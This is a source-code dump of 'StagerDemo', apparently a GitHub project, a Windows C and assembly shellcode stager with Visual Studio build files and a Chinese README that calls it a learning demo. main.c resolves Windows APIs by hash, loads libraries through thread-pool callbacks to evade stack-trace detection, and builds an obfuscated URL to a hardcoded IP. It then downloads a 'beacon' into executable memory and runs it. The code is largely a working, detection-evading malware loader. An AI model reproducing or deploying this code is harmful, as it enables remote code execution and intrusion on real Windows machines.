├── 64BitHelper.h ├── AdjustStack.asm ├── AdjustStack.obj ├── GetProcWithHash.h ├── README.md ├── WorkCallback.asm ├── WorkCallback.obj ├── function_link_order.txt ├── function_link_order64.txt ├── main.c ├── myStager.sln ├── myStager.vcxproj ├── myStager.vcxproj.filters └── myStager.vcxproj.user /64BitHelper.h: -------------------------------------------------------------------------------- 1 | #if defined(_WIN64) 2 | extern VOID AlignRSP(VOID); 3 | 4 | VOID Begin(VOID) 5 | { 6 | // Call the ASM stub that will guarantee 16-byte stack alignment. 7 | // The stub will then call the ExecutePayload. 8 | AlignRSP(); 9 | } 10 | #endif -------------------------------------------------------------------------------- /AdjustStack.asm: -------------------------------------------------------------------------------- 1 | ; Author: Matthew Graeber (@mattifestation) 2 | ; License: BSD 3-Clause 3 | ; Syntax: MASM 4 | ; Build Syntax: ml64 /c /Cx AdjustStack.asm 5 | ; Output: AdjustStack.obj 6 | ; Notes: I really wanted to avoid having this external dependency but I couldn't 7 | ; come up with any other way to guarantee 16-byte stack alignment in 64-bit 8 | ; shellcode written in C. 9 | 10 | EXTRN ExecutePayload:PROC 11 | PUBLIC AlignRSP ; Marking AlignRSP as PUBLIC allows for the function 12 | ; to be called as an extern in our C code. 13 | 14 | _TEXT SEGMENT 15 | 16 | ; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior 17 | ; to calling the entry point of the payload. This is necessary because 64-bit functions 18 | ; in Windows assume that they were called with 16-byte stack alignment. When amd64 19 | ; shellcode is executed, you can't be assured that you stack is 16-byte aligned. For example, 20 | ; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely 21 | ; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte) 22 | ; alignment. 23 | 24 | AlignRSP PROC 25 | push rsi ; Preserve RSI since we're stomping on it 26 | mov rsi, rsp ; Save the value of RSP so it can be restored 27 | and rsp, 0FFFFFFFFFFFFFFF0h ; Align RSP to 16 bytes 28 | sub rsp, 020h ; Allocate homing space for ExecutePayload 29 | call ExecutePayload ; Call the entry point of the payload 30 | mov rsp, rsi ; Restore the original value of RSP 31 | pop rsi ; Restore RSI 32 | ret ; Return to caller 33 | AlignRSP ENDP 34 | 35 | _TEXT ENDS 36 | 37 | END -------------------------------------------------------------------------------- /AdjustStack.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BambiZombie/StagerDemo/6c8b2487e5ec4fa338f8a876695c1af7c34aa748/AdjustStack.obj -------------------------------------------------------------------------------- /GetProcWithHash.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // This compiles to a ROR instruction 5 | // This is needed because _lrotr() is an external reference 6 | // Also, there is not a consistent compiler intrinsic to accomplish this across all three platforms. 7 | #define ROTR32(value, shift) (((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift))) 8 | 9 | // Redefine PEB structures. The structure definitions in winternl.h are incomplete. 10 | typedef struct _MY_PEB_LDR_DATA { 11 | ULONG Length; 12 | BOOL Initialized; 13 | PVOID SsHandle; 14 | LIST_ENTRY InLoadOrderModuleList; 15 | LIST_ENTRY InMemoryOrderModuleList; 16 | LIST_ENTRY InInitializationOrderModuleList; 17 | } MY_PEB_LDR_DATA, * PMY_PEB_LDR_DATA; 18 | 19 | typedef struct _MY_LDR_DATA_TABLE_ENTRY 20 | { 21 | LIST_ENTRY InLoadOrderLinks; 22 | LIST_ENTRY InMemoryOrderLinks; 23 | LIST_ENTRY InInitializationOrderLinks; 24 | PVOID DllBase; 25 | PVOID EntryPoint; 26 | ULONG SizeOfImage; 27 | UNICODE_STRING FullDllName; 28 | UNICODE_STRING BaseDllName; 29 | } MY_LDR_DATA_TABLE_ENTRY, * PMY_LDR_DATA_TABLE_ENTRY; 30 | 31 | HMODULE GetProcAddressWithHash(DWORD dwModuleFunctionHash) 32 | { 33 | PPEB PebAddress; 34 | PMY_PEB_LDR_DATA pLdr; 35 | PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry; 36 | PVOID pModuleBase; 37 | PIMAGE_NT_HEADERS pNTHeader; 38 | DWORD dwExportDirRVA; 39 | PIMAGE_EXPORT_DIRECTORY pExportDir; 40 | PLIST_ENTRY pNextModule; 41 | DWORD dwNumFunctions; 42 | USHORT usOrdinalTableIndex; 43 | PDWORD pdwFunctionNameBase; 44 | PCSTR pFunctionName; 45 | UNICODE_STRING BaseDllName; 46 | DWORD dwModuleHash; 47 | DWORD dwFunctionHash; 48 | PCSTR pTempChar; 49 | DWORD i; 50 | 51 | #if defined(_WIN64) 52 | PebAddress = (PPEB)__readgsqword(0x60); 53 | #else 54 | PebAddress = (PPEB)__readfsdword(0x30); 55 | #endif 56 | 57 | pLdr = (PMY_PEB_LDR_DATA)PebAddress->Ldr; 58 | pNextModule = pLdr->InLoadOrderModuleList.Flink; 59 | pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY)pNextModule; 60 | 61 | while (pDataTableEntry->DllBase != NULL) 62 | { 63 | dwModuleHash = 0; 64 | pModuleBase = pDataTableEntry->DllBase; 65 | BaseDllName = pDataTableEntry->BaseDllName; 66 | pNTHeader = (PIMAGE_NT_HEADERS)((ULONG_PTR)pModuleBase + ((PIMAGE_DOS_HEADER)pModuleBase)->e_lfanew); 67 | dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress; 68 | 69 | // Get the next loaded module entry 70 | pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY)pDataTableEntry->InLoadOrderLinks.Flink; 71 | 72 | // If the current module does not export any functions, move on to the next module. 73 | if (dwExportDirRVA == 0) 74 | { 75 | continue; 76 | } 77 | 78 | // Calculate the module hash 79 | for (i = 0; i < BaseDllName.MaximumLength; i++) 80 | { 81 | pTempChar = ((PCSTR)BaseDllName.Buffer + i); 82 | 83 | dwModuleHash = ROTR32(dwModuleHash, 13); 84 | 85 | if (*pTempChar >= 0x61) 86 | { 87 | dwModuleHash += *pTempChar - 0x20; 88 | } 89 | else 90 | { 91 | dwModuleHash += *pTempChar; 92 | } 93 | } 94 | 95 | pExportDir = (PIMAGE_EXPORT_DIRECTORY)((ULONG_PTR)pModuleBase + dwExportDirRVA); 96 | 97 | dwNumFunctions = pExportDir->NumberOfNames; 98 | pdwFunctionNameBase = (PDWORD)((PCHAR)pModuleBase + pExportDir->AddressOfNames); 99 | 100 | for (i = 0; i < dwNumFunctions; i++) 101 | { 102 | dwFunctionHash = 0; 103 | pFunctionName = (PCSTR)(*pdwFunctionNameBase + (ULONG_PTR)pModuleBase); 104 | pdwFunctionNameBase++; 105 | 106 | pTempChar = pFunctionName; 107 | 108 | do 109 | { 110 | dwFunctionHash = ROTR32(dwFunctionHash, 13); 111 | dwFunctionHash += *pTempChar; 112 | pTempChar++; 113 | } while (*(pTempChar - 1) != 0); 114 | 115 | dwFunctionHash += dwModuleHash; 116 | 117 | if (dwFunctionHash == dwModuleFunctionHash) 118 | { 119 | usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR)pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i)); 120 | return (HMODULE)((ULONG_PTR)pModuleBase + *(PDWORD)(((ULONG_PTR)pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex))); 121 | } 122 | } 123 | } 124 | 125 | // All modules have been exhausted and the function was not found. 126 | return NULL; 127 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # StagerDemo 2 | 一个demo 3 | https://xz.aliyun.com/t/12273 4 | 5 | ## 免责声明 6 | 7 | 该工具仅用于网络安全学习 8 | 9 | 由于传播、利用此工具所提供的信息而造成的后果失,均由使用者负责,作者不为此承担任何责任。 10 | 11 | 未经网络安全部门及相关部门允许,不得善自使用本工具进行任何攻击活动。 12 | 13 | 该工具只用于个人学习,请勿用于非法用途,请遵守网络安全法,否则后果作者概不负责。 14 | -------------------------------------------------------------------------------- /WorkCallback.asm: -------------------------------------------------------------------------------- 1 | EXTRN getLoadLibraryA: PROC 2 | PUBLIC myLoadLibrary 3 | PUBLIC myNtAllocateVirtualMemory 4 | 5 | _TEXT SEGMENT 6 | 7 | myLoadLibrary PROC 8 | movq xmm3, rdx 9 | xor rdx, rdx 10 | call getLoadLibraryA 11 | movq rcx, xmm3 12 | xorps xmm3, xmm3 13 | jmp rax 14 | myLoadLibrary ENDP 15 | 16 | myNtAllocateVirtualMemory PROC 17 | mov rbx, rdx ; backing up the struct as we are going to stomp rdx 18 | mov rax, [rbx] ; NtAllocateVirtualMemory 19 | mov rcx, [rbx + 8h] ; HANDLE ProcessHandle 20 | mov rdx, [rbx + 10h] ; PVOID *BaseAddress 21 | xor r8, r8 ; ULONG_PTR ZeroBits 22 | mov r9, [rbx + 18h] ; PSIZE_T RegionSize 23 | mov r10, [rbx + 20h] ; ULONG Protect 24 | mov [rsp+30h], r10 ; stack pointer for 6th arg 25 | mov r10, 3000h ; ULONG AllocationType 26 | mov [rsp+28h], r10 ; stack pointer for 5th arg 27 | jmp rax 28 | myNtAllocateVirtualMemory ENDP 29 | 30 | _TEXT ENDS 31 | 32 | END -------------------------------------------------------------------------------- /WorkCallback.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BambiZombie/StagerDemo/6c8b2487e5ec4fa338f8a876695c1af7c34aa748/WorkCallback.obj -------------------------------------------------------------------------------- /function_link_order.txt: -------------------------------------------------------------------------------- 1 | ExecutePayload 2 | GetProcAddressWithHash -------------------------------------------------------------------------------- /function_link_order64.txt: -------------------------------------------------------------------------------- 1 | Begin 2 | GetProcAddressWithHash 3 | ExecutePayload 4 | myLoadLibrary 5 | getLoadLibraryA -------------------------------------------------------------------------------- /main.c: -------------------------------------------------------------------------------- 1 | #define WIN32_LEAN_AND_MEAN 2 | #pragma warning( disable : 4201 ) 3 | 4 | #include "GetProcWithHash.h" 5 | #include "64BitHelper.h" 6 | #include 7 | 8 | 9 | /* Bypass Stack Trace */ 10 | 11 | typedef HMODULE(WINAPI* FN_LoadLibraryA)( 12 | _In_ LPCSTR lpLibFileName 13 | ); 14 | 15 | typedef NTSTATUS(NTAPI* FN_TpAllocWork)( 16 | _Out_ PTP_WORK* WorkReturn, 17 | _In_ PTP_WORK_CALLBACK Callback, 18 | _Inout_opt_ PVOID Context, 19 | _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron 20 | ); 21 | 22 | typedef VOID(NTAPI* FN_TpPostWork)( 23 | _Inout_ PTP_WORK Work 24 | ); 25 | 26 | typedef VOID(NTAPI* FN_TpReleaseWork)( 27 | _Inout_ PTP_WORK Work 28 | ); 29 | 30 | typedef DWORD(WINAPI* FN_WaitForSingleObject)( 31 | _In_ HANDLE hHandle, 32 | _In_ DWORD dwMilliseconds 33 | ); 34 | 35 | typedef struct _NTALLOCATEVIRTUALMEMORY_ARGS { 36 | UINT_PTR pNtAllocateVirtualMemory; // pointer to NtAllocateVirtualMemory - rax 37 | HANDLE hProcess; // HANDLE ProcessHandle - rcx 38 | PVOID* address; // PVOID *BaseAddress - rdx; ULONG_PTR ZeroBits - 0 - r8 39 | PSIZE_T size; // PSIZE_T RegionSize - r9; ULONG AllocationType - MEM_RESERVE|MEM_COMMIT = 3000 - stack pointer 40 | ULONG permissions; // ULONG Protect - PAGE_EXECUTE_READ - 0x20 - stack pointer 41 | } NTALLOCATEVIRTUALMEMORY_ARGS, * PNTALLOCATEVIRTUALMEMORY_ARGS; 42 | 43 | 44 | /* Stager API */ 45 | 46 | typedef int(WINAPI* FN_wsprintfA)( 47 | _Out_ LPSTR unnamedParam1, 48 | _In_ LPCSTR unnamedParam2, 49 | ... 50 | ); 51 | 52 | // typedef LPVOID(WINAPI* FN_VirtualAlloc)( 53 | // _In_opt_ LPVOID lpAddress, 54 | // _In_ SIZE_T dwSize, 55 | // _In_ DWORD flAllocationType, 56 | // _In_ DWORD flProtect 57 | // ); 58 | 59 | typedef LPVOID(WINAPI* FN_InternetOpenA)( 60 | _In_ LPCSTR lpszAgent, 61 | _In_ DWORD dwAccessType, 62 | _In_ LPCSTR lpszProxy, 63 | _In_ LPCSTR lpszProxyBypass, 64 | _In_ DWORD dwFlags 65 | ); 66 | 67 | typedef HANDLE(WINAPI* FN_InternetOpenUrlA)( 68 | _In_ LPVOID hInternet, 69 | _In_ LPCSTR lpszUrl, 70 | _In_ LPCSTR lpszHeaders, 71 | _In_ DWORD dwHeadersLength, 72 | _In_ DWORD dwFlags, 73 | _In_ DWORD_PTR dwContext 74 | ); 75 | 76 | typedef BOOL(WINAPI* FN_InternetReadFile)( 77 | _In_ LPVOID hFile, 78 | _Out_ LPVOID lpBuffer, 79 | _In_ DWORD dwNumberOfBytesToRead, 80 | _Out_ LPDWORD lpdwNumberOfBytesRead 81 | ); 82 | 83 | // typedef BOOL(WINAPI* FN_VirtualProtect)( 84 | // _In_ LPVOID lpAddress, 85 | // _In_ SIZE_T dwSize, 86 | // _In_ DWORD dlNewProtect, 87 | // _Out_ PDWORD lpflOldProtect 88 | // ); 89 | 90 | typedef struct tagApiInterface { 91 | // FN_LoadLibraryA pfnLoadLibrary; 92 | FN_TpAllocWork pfnTpAllocWork; 93 | FN_TpPostWork pfnTpPostWork; 94 | FN_TpReleaseWork pfnTpReleaseWork; 95 | FN_WaitForSingleObject pfnWaitForSingleObject; 96 | FN_wsprintfA pfnWsprintfA; 97 | // FN_VirtualAlloc pfnVirtualAlloc; 98 | FN_InternetOpenA pfnInternetOpenA; 99 | FN_InternetOpenUrlA pfnInternetOpenUrlA; 100 | FN_InternetReadFile pfnInternetReadFile; 101 | // FN_VirtualProtect pfnVirtualProtect; 102 | }APIINTERFACE, * PAPIINTERFACE; 103 | 104 | 105 | EXTERN_C UINT_PTR getLoadLibraryA() { 106 | FARPROC pLoadLibraryA = (FN_LoadLibraryA)GetProcAddressWithHash(0x0726774C); 107 | return (UINT_PTR)pLoadLibraryA; 108 | } 109 | 110 | EXTERN_C VOID CALLBACK myLoadLibrary(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work); 111 | EXTERN_C VOID CALLBACK myNtAllocateVirtualMemory(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work); 112 | 113 | 114 | VOID ExecutePayload(VOID) 115 | { 116 | APIINTERFACE ai; 117 | NTALLOCATEVIRTUALMEMORY_ARGS ntAllocateVirtualMemoryUrlArgs; 118 | NTALLOCATEVIRTUALMEMORY_ARGS ntAllocateVirtualMemoryBeaconArgs; 119 | PTP_WORK LoadUser32 = NULL; 120 | PTP_WORK LoadWininet = NULL; 121 | PTP_WORK AllocUrl = NULL; 122 | PTP_WORK AllocBeacon = NULL; 123 | LPVOID httpurl = NULL; 124 | LPVOID beacon = NULL; 125 | SIZE_T allocatedurlsize = 0x30; 126 | SIZE_T allocatedbeaconsize = 0x400000; 127 | // DWORD dwOldProtect; 128 | 129 | int recv_tmp = 0, recv_tot = 0; 130 | char* beacon_index = NULL; 131 | 132 | char szWininet[] = { 'w', 'i', 'n', 'i', 'n', 'e', 't', '.', 'd', 'l', 'l', 0 }; 133 | char szUser32[] = { 'u','s','e','r','3','2','.','d','l','l', 0 }; 134 | 135 | char v1[] = { 'h','t','t','p', 0 }; 136 | char v2[] = { ':','/','/','1', 0 }; 137 | char v3[] = { '9','2','.','1', 0 }; 138 | char v4[] = { '6','8','.','2', 0 }; 139 | char v5[] = { '0','6','.','1', 0 }; 140 | char v6[] = { '2','9','/','F', 0 }; 141 | char v7[] = { 'M','s','W', 0, 0 }; 142 | char v8[] = { 0, 0, 0, 0, 0 }; 143 | char v9[] = { 0, 0, 0, 0, 0 }; 144 | char v10[] = { 0, 0, 0, 0, 0 }; 145 | char v11[] = { 0, 0, 0, 0, 0 }; 146 | char v12[] = { 0, 0, 0, 0, 0 }; 147 | 148 | BYTE format[] = { '%','s','%','s','%','s','%','s','%','s','%','s','%','s','%','s','%','s','%','s','%','s','%','s',0 }; 149 | 150 | #pragma warning( push ) 151 | #pragma warning( disable : 4055 ) 152 | ai.pfnTpAllocWork = (FN_TpAllocWork)GetProcAddressWithHash(0x0E5DB99D); 153 | ai.pfnTpPostWork = (FN_TpPostWork)GetProcAddressWithHash(0x71C731FF); 154 | ai.pfnTpReleaseWork = (FN_TpReleaseWork)GetProcAddressWithHash(0x716B173C); 155 | ai.pfnWaitForSingleObject = (FN_WaitForSingleObject)GetProcAddressWithHash(0x601D8708); 156 | #pragma warning( pop ) 157 | 158 | /* Load User32.dll */ 159 | ai.pfnTpAllocWork(&LoadUser32, (PTP_WORK_CALLBACK)myLoadLibrary, (PVOID)szUser32, NULL); 160 | ai.pfnTpPostWork(LoadUser32); 161 | ai.pfnTpReleaseWork(LoadUser32); 162 | 163 | /* Load Wininet.dll */ 164 | ai.pfnTpAllocWork(&LoadWininet, (PTP_WORK_CALLBACK)myLoadLibrary, (PVOID)szWininet, NULL); 165 | ai.pfnTpPostWork(LoadWininet); 166 | ai.pfnTpReleaseWork(LoadWininet); 167 | 168 | /* Allocate Memory For URL */ 169 | ntAllocateVirtualMemoryUrlArgs.pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddressWithHash(0x9488B12D); 170 | ntAllocateVirtualMemoryUrlArgs.hProcess = (HANDLE)-1; 171 | ntAllocateVirtualMemoryUrlArgs.address = &httpurl; 172 | ntAllocateVirtualMemoryUrlArgs.size = &allocatedurlsize; 173 | ntAllocateVirtualMemoryUrlArgs.permissions = PAGE_READWRITE; 174 | 175 | ai.pfnTpAllocWork(&AllocUrl, (PTP_WORK_CALLBACK)myNtAllocateVirtualMemory, &ntAllocateVirtualMemoryUrlArgs, NULL); 176 | ai.pfnTpPostWork(AllocUrl); 177 | ai.pfnTpReleaseWork(AllocUrl); 178 | 179 | /* Allocate Memory For Beacon */ 180 | ntAllocateVirtualMemoryBeaconArgs.pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddressWithHash(0x9488B12D); 181 | ntAllocateVirtualMemoryBeaconArgs.hProcess = (HANDLE)-1; 182 | ntAllocateVirtualMemoryBeaconArgs.address = &beacon; 183 | ntAllocateVirtualMemoryBeaconArgs.size = &allocatedbeaconsize; 184 | ntAllocateVirtualMemoryBeaconArgs.permissions = PAGE_EXECUTE_READWRITE; 185 | 186 | ai.pfnTpAllocWork(&AllocBeacon, (PTP_WORK_CALLBACK)myNtAllocateVirtualMemory, &ntAllocateVirtualMemoryBeaconArgs, NULL); 187 | ai.pfnTpPostWork(AllocBeacon); 188 | ai.pfnTpReleaseWork(AllocBeacon); 189 | 190 | ai.pfnWaitForSingleObject((HANDLE)-1, 0x1000); 191 | 192 | #pragma warning( push ) 193 | #pragma warning( disable : 4055 ) 194 | ai.pfnWsprintfA = (FN_wsprintfA)GetProcAddressWithHash(0xD0EB608D); 195 | // ai.pfnVirtualAlloc = (FN_VirtualAlloc)GetProcAddressWithHash(0xE553A458); 196 | ai.pfnInternetOpenA = (FN_InternetOpenA)GetProcAddressWithHash(0xA779563A); 197 | ai.pfnInternetOpenUrlA = (FN_InternetOpenUrlA)GetProcAddressWithHash(0xF07A8777); 198 | ai.pfnInternetReadFile = (FN_InternetReadFile)GetProcAddressWithHash(0xE2899612); 199 | // ai.pfnVirtualProtect = (FN_VirtualProtect)GetProcAddressWithHash(0xC38AE110); 200 | #pragma warning( pop ) 201 | 202 | // char* HttpURL = (char*)ai.pfnVirtualAlloc(0, 48, MEM_COMMIT, PAGE_READWRITE); 203 | ai.pfnWsprintfA(httpurl, (char*)format, v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12); 204 | LPVOID hInternet = ai.pfnInternetOpenA(0, 0, NULL, 0, NULL); 205 | HANDLE hInternetOpenUrl = ai.pfnInternetOpenUrlA(hInternet, httpurl, NULL, 0, 0x80000000, 0); 206 | // LPVOID addr = ai.pfnVirtualAlloc(0, 0x400000, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 207 | 208 | recv_tmp = 1; 209 | recv_tot = 0; 210 | beacon_index = beacon; 211 | 212 | while (recv_tmp > 0) { 213 | ai.pfnInternetReadFile(hInternetOpenUrl, beacon_index, 8192, (PDWORD)&recv_tmp); 214 | recv_tot += recv_tmp; 215 | beacon_index += recv_tmp; 216 | } 217 | 218 | // ai.pfnVirtualProtect(addr, 0x400000, PAGE_EXECUTE_READ, &dwOldProtect); 219 | // ((void(*)())addr)(); 220 | ((void(*)())beacon)(); 221 | } -------------------------------------------------------------------------------- /myStager.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.4.33122.133 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "myStager", "myStager.vcxproj", "{C3B4A595-432A-48E5-8FEF-5292C981A6B6}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Debug|x64.ActiveCfg = Debug|x64 17 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Debug|x64.Build.0 = Debug|x64 18 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Debug|x86.ActiveCfg = Debug|Win32 19 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Debug|x86.Build.0 = Debug|Win32 20 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Release|x64.ActiveCfg = Release|x64 21 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Release|x64.Build.0 = Release|x64 22 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Release|x86.ActiveCfg = Release|Win32 23 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {4D671D89-B657-4A67-BDED-AD4E904EC736} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /myStager.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {c3b4a595-432a-48e5-8fef-5292c981a6b6} 25 | csstagerexe 26 | 10.0 27 | myStager 28 | 29 | 30 | 31 | Application 32 | true 33 | v143 34 | Unicode 35 | 36 | 37 | Application 38 | false 39 | v143 40 | true 41 | Unicode 42 | 43 | 44 | Application 45 | true 46 | v143 47 | Unicode 48 | 49 | 50 | Application 51 | false 52 | v143 53 | true 54 | Unicode 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | 80 | 81 | Console 82 | true 83 | AdjustStack.obj;%(AdditionalDependencies) 84 | 85 | 86 | 87 | 88 | Level4 89 | true 90 | true 91 | true 92 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 93 | true 94 | false 95 | CompileAsC 96 | MinSpace 97 | true 98 | AssemblyCode 99 | Size 100 | 101 | 102 | Console 103 | true 104 | true 105 | true 106 | UseLinkTimeCodeGeneration 107 | ExecutePayload 108 | false 109 | true 110 | function_link_order.txt 111 | true 112 | 113 | 114 | 115 | 116 | Level3 117 | true 118 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | true 120 | 121 | 122 | Console 123 | true 124 | %(AdditionalDependencies) 125 | 126 | 127 | 128 | 129 | Level4 130 | true 131 | true 132 | true 133 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 134 | true 135 | false 136 | CompileAsC 137 | Disabled 138 | true 139 | AssemblyCode 140 | Neither 141 | 142 | 143 | Console 144 | true 145 | true 146 | true 147 | UseLinkTimeCodeGeneration 148 | WorkCallback.obj;AdjustStack.obj;%(AdditionalDependencies) 149 | Begin 150 | false 151 | true 152 | function_link_order64.txt 153 | true 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | -------------------------------------------------------------------------------- /myStager.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 头文件 20 | 21 | 22 | 头文件 23 | 24 | 25 | 26 | 27 | 源文件 28 | 29 | 30 | -------------------------------------------------------------------------------- /myStager.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | --------------------------------------------------------------------------------